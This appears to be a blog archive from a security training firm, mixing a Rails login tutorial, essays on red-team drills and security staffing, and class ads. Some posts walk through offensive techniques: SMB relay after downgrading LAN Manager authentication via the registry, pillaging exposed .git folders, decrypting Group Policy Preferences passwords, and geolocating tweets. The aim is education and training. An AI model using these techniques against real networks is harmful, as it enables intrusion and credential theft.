Located at /app/controllers/application_controller.rb

Notice on line 8 we define a method called current_user. This pulls a user_id value from the Rails session. In order to make the current_user method accessible outside of just this controller and extend it to the view, we have annotated it as a helper_method on line 4.

The next thing we need to do now is actually make the signup page. First, let's modify the attributes that are mass assignable via attr_accessilbe in the user model file.

Next, review the users_controller.rb file and add the methods new & create. When new is called, instantiate a new blank User object (@user). Under the create method, we can modify a new user element leveraging the parameters submitted by the user (email, password, password_confirmation) to create the user.

Explanation of the Intended Flow -

User clicks "signup" and is sent to /signup (GET request).

User is routed to the "new" action within the "user" controller and then the HTML content is rendered from - /app/views/users/new.html.erb.

Upon filling in the form data presented via new.html.erb, the user clicks "submit" and this data is sent off, this time in a POST request, to /users.

The POST request to /users translates to the "create" action within the "user" controller.

Now, obviously we are missing something.....we need a signup page! Let's code that up under new.html.erb.

/app/views/users/new.html.erb

The internals of Rails and how we are able to treat @user as an enumerable object and create label tags and text field tags might be a little too complicated for this post. That being said, basically, the @user object (defined in the User controller under the new action - ex: @user = User.new) has properties associated with it such as email, password, and password confirmation. When Rails renders the view, it generates the parameter names based off the code in this file. In the end, the parameters will look like something like user[email] and user[password_confirmation], for example. Here is what the actual request looks like in Burp...

Signup form generated by the code within /app/views/users/new.html.erb

Raw request of signup form submission captured.

Okay, so, now we have registered a user. The last piece here is to have a home page to view after successful authentication and also code the logout link logic so that it actually does something.

In order to do this, let's make a quick change in the sessions controller. Under the create method, we change home_path to home_index_path as well as create a destroy method which callsthe Rails method "reset_session" and redirects the user back to the root_url. Also, remove the content within the index action under the home controller.

People often try to draw analogies between computer security and the military or warfare. Lets put aside for a moment the fact that I don't know anything about the military and continue on with this analogy.

Ask yourself for a moment: "What does the average person in the military spend their time doing?" And the answer I believe is training, drilling and exercising. They don't spend the vast majority of their time in heated battle. In fact only small spurts of time, I'd imagine, are spent that way.

Does your defence team spend all its time engaged in cyber battle? If not do they spend most of their time training, exercising and practising for future incidents? If not why not?

In my experience most defensive teams are in meetings, playing with tools, creating presentations, maintaining systems or perhaps doing some ad hoc analysis. Occasionally they might be engaged in research.

It is my belief that much like soldiers, these teams should spend a large majority of their time in training. And the best way to do this training is to have an outside entity play the adversary much like the Airforce Aggressor Squadrons.

Traditional penetration testing does NOT use enemy tactics, techniques and procedures. Penetration testing in general these days is simply patch management verification. Penetration testing often focuses on known exploits and real attackers do not. Attackers either use 0days, complex configuration/design issues or malware.

What's nice about the computer security realm is that it is much easier to replicate adversary "equipment" than with aircraft. The best methods to acquire this equipment is to conduct incident response engagements and/or to have global sources that provide samples and intrusion information.

These samples can then be reverse engineered, their functionality recreated and used in ongoing drills to keep defensive teams sharp.

I have come to believe that defence teams should be constantly drilling against adversary teams. This is the best way they can get better, find institutional deficiencies, improve and validate procedures, etc. This sort of ongoing training is more expensive than penetration testing for sure, but far outstrips traditional penetration testing in benefits.

- - -

Example Drill:

Day 1:Adversary team sneaks a person into the client facility and embeds a device that provides a command and control foothold out to the internet.

The C2 is designed to appear like a specific attacker's behaviour such as a beacon which non-SSL encryption cipher over port 443 with a specific user-agent.

Day 2:

The adversary team begins lateral attack using a custom tool similar to psexec along with a special LSASS injection tool.

The team then sets up persistence using a non-public (but used by real attackers) registry related method along with an RDP related backdoor.

Day 3:

Next the team indexes all documents and stores them in a semi-hidden location on the hard drive in a cd sized chunk using a non-english language version of winrar and a password captured from an incident response event. The team searches out, identifies and compromises, systems, users and data of interest. Each drill may have a different target such as PCI, engineering related intellectual property, executive communications.

Day 4:

Finally the team ex-filtrates this data and prepares the notification document.

Day 5:

The team notifies the client that the week's drill is complete, likely has a conference call or VTC and answers questions related to the exercise. The notification stage includes data that can be used in signatures and alerts such as PCAPS, indicators of compromise, etc. The team and client then discuss what if anything was detected and what could have been done to improve performance, procedures, etc. Plans to tune and improve defensive system configurations can be developed at this stage as well.

- - -

If your defensive staff is not doing something along these lines at LEAST once a quarter if not once a month then your soldiers are untrained and likely to get slaughtered when its time for the real battle.

Having played both the attacker and defender role for many years something I have often seen and even done myself is make statements and assumptions about the "sophistication" of my adversary.Often when some big hack occurs, blogs, media stories and quotes from experts will espouse opinions that "the attacker was not very sophisticated" or "it was an extremely sophisticated attack". I believe that often times, and I myself have been guilty of this, these assertions are the result of a wrong headed analysis and misunderstanding of what sophistication means in the context of computer attacks.An example will help illustrate the point. I have heard stuxnet labeled both sophisticated and unsophisticated. One might be tempted to point to the inclusion of 4 0days as proving that highly skilled attackers launched this attack. Well 0days can be bought. Others might say; well the way it was caught and the fact that it could infect more than it's presumed target means the attackers weren't very good. Even the most well developed attacks get caught eventually. (See the device the Russians implanted in the Great Seal 60 years ago)A truly sophisticated attacker will use only what is necessary and cost effective to achieve their goals and no more. An even better attacker will attempt to convince you they are not very good and waste as much of your time as possible while still achieving the goal.I would put forth the idea that the determination of sophistication be based on the following:Did the attacker achieve their goals?Let us assume further that these goals consist of:1.) Gaining unauthorized access to one or more of your systemsIf they achieve #1 then they have already proven to be more sophisticated than your first line of defensive / prevention system as well as your user awareness and training program.To speak of the attacker as unsophisticated because they used an automated SQL injection tool or basic phishing email is silly because you have no idea how good they are based soley on the penetration mechanism and they are already more sophisticated than your ability to stop them.2.) Evasion of detection, at least for the period of time required to complete some goalsIf they have a shell on one of your systems, and nothing detects, alerts or responds, then the attacker is more sophisticated than your SIM implementation, IDS and first line analysts at least from the detection during initial attack standpoint. The fact that they used XOR vs full SSL to protect network communications from detection is irrelevant and gives you no clue as to how good they are.3.) Access to and/or exfiltration of sensitive dataIf the attacker has been able to take the data they are targeting then they have overcome your internal controls, ACLs and data protection. It matters not if they used a zip file or steganography to package the data.4.) PersistenceIf the attacker can persist with unauthorized access on your system for any period of time then they have outsmarted your defensive team, your secure configuration management and basically all your defenses. It doesn't matter if their method of persistence is a simple userland executable launched from the Run key in the registry or a highly stealthy kernel driver, they won that round.5.) EffectIf they can cause a real world effect such as blowing up your centrifuges, gaining a competitive advantage, or spending your money then that is the final nail in your coffin. They are more sophisticated than you are, regardless of what type of exploit they used, if it was a 10 year old PERL CGI bug or one that uses memory tai chi to elegantly overcome windows 7 buffer overflow protection. Lets think about this for a minute. Think of all the money, time, resources and personel you have expended on perimeter defense, detection and alerting, and analytical teams. Think of the work involved at the vendors who have developed all of the products and appliances you have purchased. The PHDs at AV vendors designing heuristics, the smart guys and girls developing exploits and signatures at your favorite IDS company. The awesome hax0rs at the pen test company you just hired. The often millions of dollars spent on defense.All of this and the attacker has subverted it, maybe with a month of work, maybe less, and considerably less funding in most cases. So who is the sophisticated one?The only place you might have won is in the forensics post-event department, usually the least funded and most resource starved component of your program. This is usually where the determination is made that the attacker was not very sophisticated because it was possible to reverse engineer the attack and understand the tools and techniques used. That's great but just because you an understand that an assasin used a rock to kill a VIP doesn't mean the assasin sucks if they got away from the highly skilled protection detail, the target is dead, and their identity remains unknown.So pause for a moment before you label an attacker unsophisticated or a skript kiddie. Ask yourself, did they achieve the above mentioned goas? If so then they outsmarted you.V.

Lately we have had a number of posts about our training classes, and I said I would put something technical up on the blog. In one of our classes, we teach students how to think like real bad guys and think beyond exploits. We teach how to examine a situation, how to handle that situation, and then how to capitalize on that situation. Recently on an engagement, I had to figure out how to exploit a domain-based account that could log into all Windows 7 hosts on the network, but there were network ACLs in place that prohibited SMB communications between the hosts. So, I turned to SMB relay to help me out. This vulnerability has plagued Windows networks for years, and with MS08-068 and NTLMv2, MS started to make things difficult. MS08-068 won't allow you to replay the hash back to the initial sender and get a shell, but it doesn’t stop you from being able to replay the hash to another host and get a shell – at least, it doesn’t stop you as long as the host isn't speaking NTMLv2! By default, Vista and up send NTMLv2 response only for the LAN Manager authentication level. This becomes problematic in newer networks, as seen in this screen shot from my first attempt to do SMB relay between two Windows 7 hosts:

In this scenario, we have host 192.168.0.14, which I have compromised and have discovered that the domain account rgideon can probably authenticate into all Windows 7 hosts. We have applied unique Windows-based recon techniques that we teach in our class to determine this. We see that 192.168.0.13 is also a Windows 7 host, and we will look to authenticate into it, but we can't do it from the .14 host. There is a firewall between .13 and .14; so instead, we will attempt to do SMB Relay with host 192.168.0.15 as the bounce host.

So, what can we do in this scenario? We don't teach too much visual hacking in any of our classes, so everything must be done using shells, scripts, or something inconspicuous. In this situation, I did some research looking into the LAN Manager authentication protocol. I found a nice little registry key that doesn't exist by default in Vista and up, but if we put the registry key in place, then the LAN Manager authentication settings listen to the registry key. This happens on the fly; there are no reboots, logon/logoff's, etc. There is a caveat with this! You have to have administrator privileges on the first host! This scenario is about tactically exploiting networks and doing this the smart way.

Since we have a shell on our first host (192.168.0.14) and we have gotten it by migrating into processes, stealing tokens, etc., we can move a reg file with the following contents up to the first host.

This registry key is targeting the following path: HKLM\SYSTEM\CurrentControlSet\Control\Lsa.If we drop in a new DWORD value of 00000000, this will toggle the LAN Manager authentication level down to the absolute minimum, which will send LM and NTLM responses across the network. Now that we have the LAN Manager authentication value set to as low as it will go, we can capitalize on this.

Open a metasploit console (you will need admin privileges) on the host that will be set up as a bounce through host (192.168.0.15). With your msfconsole, use the exploit smb_relay and whatever payload you choose. I have chosen to use a reverse_https meterpreter. The screen shot below is an example of my settings:

Once all your settings are selected, exploit and get ready for the hard part. We need to get this account to attempt authentication to our bounce through the host with LAN Manager authentication. SMB relay in this setting is probably best used by getting the account you are targeting to visit your malicious host (192.168.0.15) through a UNC path (\\mybadhost\\share). Getting a user to do this is not something we will go into in this post. We reserve that type of thing for teaching at the class, but we have used this tactic, coupled with a few others, to compromise almost a whole Windows domain.

For brevity’s sake, we will just go ahead and simulate this activity by simply typing the following in the run dialogue box on the first victim host: (192.168.0.14) \\192.168.0.15\share\image.jpg.

I am not really hosting anything as a share on my host. I just need the LAN Manager authentication process to attempt authentication to my host (192.168.0.15). This attempt of authentication actually happens even by just typing \\192.168.0.15. With just the IP address entered, you will see authentication attempts to your host, but for large scale attacks, or something along those lines, it is best to have a full UNC path. Once the rgideon account on host 192.168.0.14 starts authentication requests to our relay host 192.168.0.15, things will actually look as though they are being denied by the end host 192.168.0.13:

As you can see, we are receiving LAN Manager authentication requests from 192.168.0.14 and attempting to relay them to 192.168.0.13, but it looks as though they are being denied. This is a false negative. Type in sessions -l in your metasploit console, and you will see that you have a meterpreter session on 192.168.0.13.

This is a simple demonstration and exploit that we teach in some of our offensive-based classes. Our Offensive Techniques is a class based on trying to show people real-world attacks coupled with unique approaches to compromising both Windows and Unix infrastructures. Offensive Techniques has various sections in it that we have seen used in APT attacks, and the class also includes custom techniques built and used by Attack Research.The goal of our training is to get you out of the mindset of traditional pen testing and show students how real offensive attacks really happen. We are hoping these types of concepts spread to the whole industry. When this happens we will be able to make an impact at the business level on how companies, governments, etc., make decisions based upon real security threats and a true security landscape. If you are interested in training that we released yesterday or have questions please visit our site or email us at training@attackresearch.com with any questions.

All too often, we at Attack Research have found that students are not being taught, or are not allowed, to properly perform real-world scenarios. For example, they want to run vulnerability scanners on penetration tests! When we say they are not allowed to perform real-world scenarios, some would say it’s the government or the company that doesn't want the real-world scenario. This might be very true, but those governments and companies received the understanding somewhere that running vulnerability scanners on a penetration test was a good idea, and this understanding came through some form of education. Think of network security back in the late 90's to early 2000's: Real-world attacks really did combine scanning for a vulnerability and then exploiting it. Sasser came along and changed the game, and we then had firewalls, improvements in host configurations, etc. In the early 2000's, we started to see what we currently recognize as training in the industry. This training was based upon the attacks in that time period. Well, the evolution of attack has changed, and so has the defense.

Don't get me wrong; the training industry has also evolved, but not at the rate it did when it first started back in the late 90's and 2000's. Back then, there really wasn't a standard for delivering attack-based training. We have certainly had our fair share of standards since then, but when there is no set standard, it is easier to create a new one than it is to change the current one. Well, it’s time to change that!Classes at Attack Research are designed to help students with real-world problems. We hope to work at a grass roots level and a management level to change the way governments and companies approach network security. This is why our classes are designed to teach technical-level, real-world content. Not only from an offensive perspective but a defensive one as well. Students will come out of our classes ready to use the skills they learned. They will learn not only how a certain tool is used but the fundamentals behind it so that when they have differing results from the tools, they will know how to handle it or, better yet, they will not use the tool and write their own!

We are proud to announce that Attack Research will be at a number of conferences and locations in 2013. Last week, we announced our partnership with Trail of Bits to offer training in the New York City area in January, April, and June.

Along with our annual training at Black Hat Las Vegas, we have joined with Source Conference to provide training at all their conferences. At Source Boston, we will be offering a 2-day version of our Offensive Techniques training. We will also be at BruCON in September!

Attack Research can transport any of its classes around the world or at your own company. If you are interested in private trainings, please drop us a line at training@attackresearch.com

Starting in 2013, we will hold trainings at Attack Research headquarters in New Mexico, where we will be offering reduced rates for all classes. The majority of our classes will be offered at this location, and they are scheduled to begin January 29-30. We will debut our brand new class, Operational Post Exploitation. You can register for this class here.

Our list of available classes is:

Offensive Techniques – Offensive Techniques offers students the opportunity to learn real offensive cyber-operation techniques. The focus is on recon, target profiling and modeling, and exploitation of trust relationships. The class will teach students non-traditional methods that follow closely what advanced adversaries do, rather than compliance-based penetration testing, and will also teach students how to break into computers without using exploits.

Operational Post-Exploitation – This class explores what to do after a successful penetration into a target, including introducing vulnerabilities rather than back doors for persistence. Operational Post-Exploitation covers such techniques as data acquisition, persistence, stealth, and password management on many different operating systems and using several scenarios.

Rapid Reverse Engineering – Rapid Reverse Engineering is a must these days with APT-style attacks and advanced adversaries. This class combines deep reverse engineering subjects with basic rapid triage techniques to provide students with a broad capability when performing malware analysis. This course will take the student from 0 to 60, focusing on learning the tools and key techniques of the trade for rapidly reverse engineering files. Students will understand how to assess rapidly all types of files.

Attacking Windows — Attacking Windows is Attack Research’s unique approach to actually securing Windows. Students will become proficient in attacking Windows systems, learning the commands that are available to help move around systems and data, and examining and employing logging and detection. It will also cover authentication mechanisms, password storage and cracking, tokens, and the domain model. Once finished with this course, students will have a foundation on how attack models on Windows actually happen and how to secure against them.Attacking Unix — Attacking Unix is Attack Research’s unique approach to actually securing Unix. Students will become proficient in attacking Unix systems, focusing mostly on Linux, Solaris and FreeBSD. SSH, Kerberos, kernel modules, file sharing, privilege escalation, home directories, and logging all will be covered in depth. Once finished with this course, students will have a foundation on how attack models on Unix actually happen and how to secure against them.Web Exploitation — The web is one of the most prevalent vectors of choice when attacking targets because websites reside outside the firewall. Web Exploitation will teach the basics in SQL injection, CGI exploits, content management systems, PHP, asp, and other back doors, as well as the mechanics of exploiting web servers.

MetaPhishing – MetaPhishing is a class designed to teach the black arts for targeted phishing operations, file format reverse engineering and infection, and non-attributable command and control systems. Once completing this class, students will have a solid foundation for all situations of phishing.

Basic Exploit Development — In order to use the tools, one must have an understanding of the basics of how they work. Basic Exploit Development will cover the step-by-step basics, tools, and methods for utilizing buffer/heap overflows on Windows and Unix.

This full listing is available on our website as well under the services/training section. Along with each class, there is a place to allow for notification of when the class will be offered next, either at Attack Research HQ or at a different location.

I will be releasing some example modules from some of our classes over the next few weeks so you can get a feel for what we are offering. If you have any questions, please don't hesitate to contact us at training@attackresearch.com

Geo/Social stalking is fun. Bing maps has the ability to add various "apps" to the map to enhance your bind maps experience. One of the cooler ones is the Twitter Map app which lets you map geotagged tweets.

Let's start with somewhere fun, like the pentagon, and see who's tweeting around there

Once you have your places picked out, you can click on the Map Apps tab.

If you click on the twitter maps app, it loads recent geo-tagged tweets

Normal 0 false false false EN-US X-NONE X-NONE MicrosoftInternetExplorer4 /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0in; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin;} Earlier this week Trail Of Bits announced our partnership with them, offering trainings in New York City. We are very excited to team up with a great company, but also to start delivering practical training in the NYC area. This is the first installment of our new training program that is designed to provide good hands-on knowledge based training that practitioners can use right away. We debuted our latest class Offensive Techniques at Countermeasure 2012 last week with incredible success. We will be offering Offensive Techniques in January with Trail Of Bits in NYC. In April, we will be releasing our new Rapid Reverse Engineering (RRE) class. RRE is a practitioner based training that is designed to give reverse engineers techniques that can be used instantly. The class is designed to help get answers from files in a very rapid manner that can be used in instances such as incident response. There will be a technical blog post soon with some example content from Offensive Techniques and Rapid Reverse Engineering. We are very happy to announce this partnership with Trail Of Bits. We will be releasing a full catalog of our available classes next week! We also offer private trainings of our classes and have the capability to offer classes almost anywhere. If you are interested or have questions email us at training@attackresearch.com

People tend to focus on various areas as being important for computer security such as memory corruption vulnerabilities, malware, anomaly detection, etc. However the lurking and most critical issue in my opinion is staffing. The truth is, there is no pool of candidates out there to draw from at a certain level in computer security. As an example, we do a lot of consulting, especially in the area of incident response, for oil & gas, avionics, finance, etc. When we go on site we find that we have to have the following skills:

1. Soft skills. (often most important) The ability to talk to customers, dress appropriately, give presentations or speak publicly, assess the customer staff, culture and politics, and determine the real goals. I can't stress enough how important this is. It's not the 90s anymore, showing up with a blue mohawk, a spike in the forehead and leather pants, not a team player, cussing and surfing porn on the customers system doesn't cut it no matter how good you are technically. If you are that guy then you get to stay in the lab and I guarantee you will make far less money. Even if you can write ASLR bypass exploits and kernel rootkits.

2. Document. This ties with the above for number 1. If you didn't document it, you didn't do it. I don't care how awesome an 0day you discovered, or what race condition in the kernel you found. If you cant clearly document it, the customer doesn't care and sees no value in what you did. The documentation has to be clean, clear, layed out so that an executive can understand it and so that the other security firm the customer hires to validate your results doesn't make fun of you.

4.) Reverse Engineering. This means disassembling binaries in IDA, running binaries in a debugger such as Ollydbg, WinDBG, IDA, memory forensics, and especially de-obfuscation. Can you unpack a binary? How about if the packer is multi-stage and does memory page check summing? What if the packer carries its own virtual machine? Do you know what breakpoints to set, when to change the Z flag, or how to hot patch a binary in memory?

5.) Understanding programming. To be good at this stuff you need to know C, C++, .NET, VB, HTML, ASP, PHP, x86 assembly and another dozen languages, at least well enough to look up APIs, understand standard libraries, discover which imports are important.

6.) Operating systems. You should know the ins and outs including file systems, memory management, kernel, library system and key command line tools of at least half a dozen OS's, especially as they are used in enterprise environments. Domains, NFS, NIS, kerberos, LDAP. So not only windows, linux and OS X, but also solaris, AIX and some embedded or mobile systems.

7.) Exploit development. Often on engagements you run across an exploit or even an 0day that you must reverse engineer, replicate safely and test on the customers particular environment. You have to be able to take it apart, analyse the shellcode, understand everything its doing and re-write your own version of it.

8.) Versatility with a wide variety of tools, many of which are not easy to access outside of the enterprise. At a minimum enough technical base knowledge to use whatever tool is put in front of you. Examples include wireshark, splunk, fireeye, netwitness, arcsight, tippingpoint, snort / sourcefire, bluecoat, websense, TMI, Encase.

All of the members of your team whether you are a consulting shop or an internal incident response team need to be able to do these things and overlap with each other. Some can be stronger in RE than network forensics but everyone has to be able to do all of it to some extent, especially 1 and 2.

The problem with this? These people don't exist, they are unicorns. Those who can do this are either already employed, well payed and tackling more interesting problems than you can offer, or they are running/partners in their own company that you could (and should) outsource to. </shameless self promotion>. But even small boutiques that can do the above are rare, heavily booked, and are charging close to high powered lawyer hourly rates. (when people question rates I point out that big name IR shops are around $400/hr and even the BestBuy geek squad charges $120/hr to reload your OS).

A lot of big contractors are trying to approach security like they did IT in the 90s and 00's. Bid low, win a huge contract, then put out job ads for anyone who knows how to use a computer. The problem is, while you can come up to speed for a help desk or to admin a windows server relatively quickly, the above list of skills takes a decade + to master. So big contractors are failing, badly, and trying to buy up the small guys. But there is another problem there as well.

People who are able to do the above 1.) Value freedom highly and don't want to work 9 to 5 in a cube farm and 2.) Don't want to live or work long periods of time onsite where you are. They don't want to live in Houston or in Cleaveland or in Indianapolis or probably even in the DC area. They want to live in La Jolla and San Francisco and New York and someone, somewhere is willing to pay them a lot to do it, and probably do it remotely most of the time, so you are going to lose there.

In response, many companies try to follow the old plan of recruiting at colleges. In a lot of cases these students come out knowing some Office and probably some Java and that's about it. You might luck out and get a good RIT, Georgia Tech, New Mexico Tech student who knows more but most likely these have already been recruited to the government or somewhere else. And the learning curve time is long enough that by the time they are really good, they have already moved on. This kind of work is PRIME for remote. Let people come in for a week every other month. If you require internal security people to be on site all the time in some crappy city you will fail.

On the security company side you have the same problem, no one to hire. So many security companies, in order to grow (because the way you make money in services is via higher staffing levels) hire whatever they can find and field them. This continues the trend in mediocre security, companies getting owned, PCI, etc. Boutiques cannot grow to the size necessary to win the bigger contracts because there is no one to hire.

The solution many companies have been trying out is to focus on buying appliances and contracting pro services to set them up and hope that automation can solve the problem. It cannot. Here is a perfect example. A customer has a box that detects malware in email attachments. It flagged a PDF as highly malicious. We decided to check it out and at first glance it looked very bad. It had all the classic signs of an exploit, heap spray, etc. You couldn't tell the difference between it and another verified malicious PDF. However, upon further inspection we discovered that a popular autocad type program generated legitimate PDFs that looked this way. This is something that is not automatible. You must have an experienced and skilled analyst to do this. No amount of rack mount, fancy logo appliances will help you. And the bigger your enterprise the more you need. Every enterprise block of 30 - 50k IPs needs a team of 5 - 10 people.

Which leads me to the next issue. How you perceive your staffing resources. Example: One company I saw told they had a staff of 12 analysts to deal with security detection and response. I thought wow pretty good! Lets break the team down:

A manager, full time in meetings, paperwork, etc.

An assistant to the manager, secretarial work, etc.

3 senior advisers, i.e. guys about to retire, smart guys who give great advice and hold institutional knowledge, but not analysts

5 people involved in tool testing, stand up and maintenance (all those boxes I mentioned before). Great guys, not analysts or really involved in analysis

1 Developer mostly focused on designing queries and interfaces for the tools.

1 Actual analyst.

While management believes they have 12 people and doesn't understand why things take so long they actually have 1 person. This situation is very common in big companies. 1 good analyst for an enterprise is not NEARLY enough. And you can't be reliant on a specific person unless you want to set yourself up for a disaster (while at the same time you must cultivate and care for those star players).

That's my case for why staffing is the most important issue we face in computer security. What is the solution? Some would say training, but lets be honest, were you back home writing rootkits for work after taking Hoglund and Butler's class at Blackhat? Probably not. Have you found piles of valuable 0day after completing Halvar's most excellent course in Vegas? I doubt it. A 2 day - 1 week course isn't doing it. Going through the entire SANS curriculum isn't doing it and CISSP sure as hell isn't doing it.

You have to spend around 6hrs a day, after work, highly focused on coding, reversing, etc. for a minimum of 2 years to be decent. That is how the adversary does it. That's how the big name researchers and best staff does it, and unfortunately you only need a couple of attackers for every 10 defenders out there.

In this portion of the series, we will create the foundation for a login page and deal a little bit more with the Model portion of MVC.

We need to be able to assign the following information to a user.

First Name

Last Name

Email Address

Password

Admin (true/false)

This is where the Model comes in. Before we jump into that, let's create a Users controller similar to the way we create a Home controller in the last post.

Note that the "new" following Users simply states that a "new" action (method) will be automatically defined in the controller for you.

Also, we should briefly cover how you connect to a database with Rails. In this tutorial, we will stick with the default configuration/database, SQLite. Navigate to config/database.yml:

If you remember Part 2 of the series, we covered the 3 default modes of Rails. This is the reason there are 3 different database configurations in this file. It is useful as your local development environment database will differ from Production (ex: database username, password, and host would/should be different).

When we are running in development mode, the database we will be using will be db/development.sqlite3 as specified on line 8. The naming convention refers to it's location and filename.

So nothing really to change there, let's go ahead and create the model.

Command(s) Breakdown:

rails - Invoking a Rails command

g - Short for generate, used to generate Rails items

model - specifies that we are generating a model

Users - the name of the model which, actually refers to both the model (app/models/users.rb) and a table in the database

first_name:string (etc.) - The first portion is the name of the column in the table and the second part (string) identifies the variable type to be stored in the database.

Now, upon generation, the model is created but the db table/columns do not yet exist. To make this happen, let's run rake db:migrate.

To give you a visual of what was just created...

Note the table "users" has been created along with the columns we identified during model creation.

This is great and later if you'd like to add an additional column to your local db, you can. What if you'd like to add a column so that the next person to download your code and run rake db:migrate also has the new column? Navigate to db/migrate/ and you'll see a file that ends in _create_users.rb. This is where you would make that change. Do NOT edit the db/schema.rb file for that purpose (this is overwritten by the migrate files).

Next, create a sessions controller:

Time to add code to the session controller (app/controllers/sessions_controller.rb).

Notice the new and create actions. The gist of this, AFAIK, is that Rails uses new to instantiate a new instance of the Model object and create will actually save data and perform some of the more permanent actions. For our purposes, the "GET" request to the sessions#new and the new.html.erb file will show a login form. Once 'POST'-ing from that login form, the create method will receive the email and password parameters.

Code Breakdown:

Line 6 - Calls a method in the User model (authenticate).Line 8 - Extract a user ID from the user's sessionLine 9 - redirects to a home path once authenticatedLine 11 - A user did not authenticate correctly and we want to send them back to the login page.

The next thing we need to discuss are the changes to your routes.rb file:

Lines 3 - The first portion (ex: logout) identifies a request for that resources, goes to sessions#destroy.Line 8 - Our root has changed to the login page (app/views/sessions/new.html.erb)Line 10-12 - We've identified resources (controllers) and instantiated some default routes. 7 to be exact:

Note that 7 routes were not manually defined by you, in your routes file but rather, Rails created them for you. This is because you specified `resources :<controller name>` in your routes.rb file. You can create views and controller actions whose names match the names of those 7 defined routes (index, create, etc.). They automagically have routes!

Code breakdown:

Line 5 - form_tag is a Rails method, notice how we encapsulate it in <%= %>. This is how we separate Rails code from regular HTML. You may also see <% %>.Line 7, 8, 11, 12 - Rails methods that are converted by Rails to define labels and input fields.Line 14 - submit_tag, again, a Rails method. Note the {:class => "btn btn-primary"}. This is a Twitter-Boostrap definition you can find here.

Now fire up your instance, you should see the following:

Note: You can't necessarily use this yet but it looks nice :-)

This was a lot of information (read: lengthy post) and while the login does not yet work, we will wrap all of this up in Part 5 of the series. While part 5 of this series will walk you through the details of the code, you can always skip ahead and grab it from this Railscast (if you'd like to finish up).

Worth a read if you havent. Unfortunately the key to his post relied on wget and directory listings making it possible to download everything in the /.git/* folders.

unfortunately(?) I dont run into this too often. What i do see is the presence of the /.git/ folder sometimes the config or index files it there but certainly no way to know what's in the object folders (where the good stuff lives)[or so i thought].

user@ubuntu:~/pentest/DVCS-Pillage/www.site.com$ more wp-config.php/** * The base configurations of the WordPress. * * This file has the following configurations: MySQL settings, Table Prefix, * Secret Keys, WordPress Language, and ABSPATH. You can find more information by * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Codex page. You can get the MySQL settings from your web host. * * This file is used by the wp-config.php creation script during the * installation. You don't have to use the web site, you can just copy this file * to "wp-config.php" and fill in the values. * * @package WordPress */

// ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define('DB_NAME', 'site_wordpress');

I did a talk at the Oct 20012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.

I've run into this on a few tests where people are taking advantage of this exteremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)

I ended up writing some ruby to do it (the blog post has some python) because the metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part. now you can do it yourself:

I needed to make a map the access points for a client. Since i cant show that map, i made another using the same technique.First take your handy dandy Android device and install Wigle Wifi Wardriving.It uses the internal GPS and wifi to log access points, their security level and their GPS Position.looks like this (yup i stole these)List of access pointsAlso makes a cute map on your phoneonce you have the APs you can export out the "run" from the data section. yes yes, the stolen photo says "settings" but if you install it today it will say "data" there now.With the KML export you can import that directly into google earth and make all sorts of neat maps by toggling the data.All Access PointsOpen Access PointsWEP Encrypted Access PointsThat's it.-CG

If you've been following along in this series you've already created a Rails application called "attackresearch, configured your Ruby/gem environment with RVM, and created a Rake task to start the application with Unicorn.

In this portion, we will create our first Rails page and configure the appropriate routes.

Now, first thing first, remove the index.html file located under the public directory:

Removing this file removes the new Rails application landing page as it is unecessary.

Fire up the server using the rake task created earlier in this series and browse to the site.

Uh-oh:Why did this occur? Rails requires some direction from you, the developer. Where does the default or "root" page live and how do I get there?

Like any good map, you need to show a route. That being said, open config/routes.rb and take a look at what I mean:

Notice the comment? Each comment block provides instructions on mapping routes in various ways. You can delete them :-). Leave the first and last line (actual code) but remove the comments.

Now that we know where to map out the route to our destination, let's create a destination. The first thing we want to do is go to our terminal and enter the following (this only has to be done once):

Remember the twitter-bootstrap-rails gem we added in the first part of this series? We just installed it. This allows us to forego some CSS and HTML work and piggyback off those of the Twitter designers (thanks gals/guys).

Next, we will generate our first controller and view. As of right now, we don't necessarily require a model. First, here is a quick break down of MVC:

Model - Used for handling data resources (databases, usually).

View - Renders HTML content to users.

Controller - Code that handles the bulk of the logic and decision making.

Generating a "Home" controller:

We used --skip-stylesheets as they are unnecessary when using twitter-bootstrap

Note that a new *View* folder was created app/views/home and a controller file "app/controllers/home_controller.rb".

One thing to be aware of. The name of your controller will have `_controller.rb` appended to it. This is the standard convention.

Time to make an entry in routes.rb. The first thing we need to define is a landing page so that if you request our URL, you have a starting page. We will call it "welcome". There are a few things that have to happen:

Make an action inside the home controller called "welcome".

Create a view page under the /app/views/home folder called "welcome.html.erb".

Configure the route but since this is our first, we will simply use `root :to => "<controller>#<action>"

Note: Rails does not require code within the action (method), only that it exists.

Note: Only one root route can exist.

Time to edit the welcome.html.erb...

Note that the h1 tag is has a look and feel defined by the h1 definition in Twitter's CSS.

Welcome Page

..And with that we have a website, sort of. To recap we covered generating a controller and making a view page as well as adding the action with the home_controller called "welcome".

That last thing I'll cover before the next tutorial is the flow of a request. So when you request http://localhost/ this is what is happening.

The config/routes.rb file is checked to see where this request should go.

Since the request is for the root page '/', it is rerouted to the Home controller and Welcome action.

Immediately following any code executing in the Welcome action (none right now), the request finally lands on the view page or the last part in it's journey, welcome.html.erb.

Again, the flow is route -> controller -> view.

If you want to see what I mean, we can stop the flow from reaching the view stage by (welcome.html.erb) by rendering content at the controller. Observe:

In the last post, Basics of Rails Part 1, we created and ran the Rails application "attackresearch". Next, we will change the Web Server to Unicorn as well as introduce the concept of Rake.

Something to note, Rails typically is run in three modes:

Test - Mode typically used for Unit Tests.

Development - Development environment, includes verbose errors and stack traces.

Production - Settings are as if you were running in this application in a production environment.

